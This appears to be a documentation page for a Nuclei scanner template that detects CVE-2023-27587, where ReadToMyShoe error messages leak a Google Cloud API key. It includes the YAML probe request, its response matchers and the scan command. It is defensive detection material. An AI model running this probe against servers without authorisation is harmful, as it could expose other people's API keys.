ReadToMyShoe - Generation of Error Message Containing Sensitive Information
ID: CVE-2023-27587
Severity: medium
Author: vagnerd
Tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project
Description
Section titled “Description”ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key.
YAML Source
Section titled “YAML Source”id: CVE-2023-27587
info: name: ReadToMyShoe - Generation of Error Message Containing Sensitive Information author: vagnerd severity: medium description: | ReadToMyShoe generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, it will include the full URL of the request, which contains the Google Cloud API key. impact: | This vulnerability can lead to the exposure of sensitive information, such as usernames, passwords, or internal system details. remediation: This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587 - https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g - https://github.com/sec-fx/CVE-2023-27587-PoC - https://github.com/rozbb/readtomyshoe/commit/8533b01c818939a0fa919c7244d8dbf5daf032af - https://nvd.nist.gov/vuln/detail/CVE-2023-27587 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 epss-score: 0.16542 epss-percentile: 0.96007 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: readtomyshoe_project product: readtomyshoe tags: cve2023,cve,debug,readtomyshoe,disclosure,readtomyshoe_project
http: - raw: - | POST /api/add-article-by-text HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/json
{ "title":"Kernsicherheitstest", "body":"Kernsicherheitstest" }
matchers-condition: and matchers: - type: dsl dsl: - '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'
- type: word words: - "Caused by:" - "TTS request failed" condition: and
- type: word part: header words: - "text/plain"
- type: status status: - 500# digest: 4a0a0047304502205bd2b269ac115df2956224ae854791b3912b20272d2dbd86eb4ff1c9e689c9f1022100afe3c2fb6b54516bf0bebe70a609d16f655d68c21ec269fb9bf851ba8e3526e0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-27587.yaml"